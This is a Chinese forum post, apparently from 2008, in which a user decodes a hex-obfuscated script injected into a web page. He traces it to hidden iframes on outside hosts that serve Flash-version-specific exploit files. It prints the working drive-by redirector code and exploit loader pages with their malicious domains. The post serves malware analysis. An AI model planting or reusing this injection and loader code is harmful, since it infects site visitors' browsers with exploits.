<script>采用了Hex加密,解密后得到:
复制内容到剪贴板
代码:
<script src=http://uin2.cn></script>打开看代码:
复制内容到剪贴板
代码:
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://zlwrnm8.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://zlwrnm8.cn/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.hryspaq.cn\/b2.htm width=50 height=0><\/iframe>")http://zlwrnm8.cn/a1/ilink.html的内容:
复制内容到剪贴板
代码:
<Script src="swfobject.js" type="text/javascript"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "DZ";
var fuckaxp = "aa";
var fuckaqp = "c";
var so=new SWFObject("./i11"+"5.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==45){
var fuckavpxa = "P";
var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else if(version['rev']==64){var hgds = "DZ";
so=new SWFObject("\x2e\x2f\x69\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==47){
var fuckavpx = "DZ";
var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
var fisx="gf";
document.getElementById('flashversion').innerHTML=""
}
}
}
var kdcxma="ogf";
</ScripT> 貌似是一个Flash溢出漏洞……
再打开http://zlwrnm8.cn/a1/flink.html看看:
复制内容到剪贴板
代码:
<Script src="swfobject.js" type="text/javascript"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "SB";
var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==64){
var fuckavp = "SB";
var fucaxavp = "SB";
var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==47){
var snjd="dsa";
var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else if(version['rev']==45){
var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}
</script>和刚才那个差不多,估计也是一个Flash溢出漏洞。
再来看最后一个——http://www.hryspaq.cn/b2.htm:
复制内容到剪贴板
代码:
<Iframe src="http://zlwrnm8.cn/a1/fxx.htm" width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<Script language="javascript" type="text/javascript" src="http://js.users.51.la/1936348.js"></script>好像又回到第一个那里去了……汗
[
本帖最后由 SONGBOWEN 于 2008-10-18 22:32 编辑 ]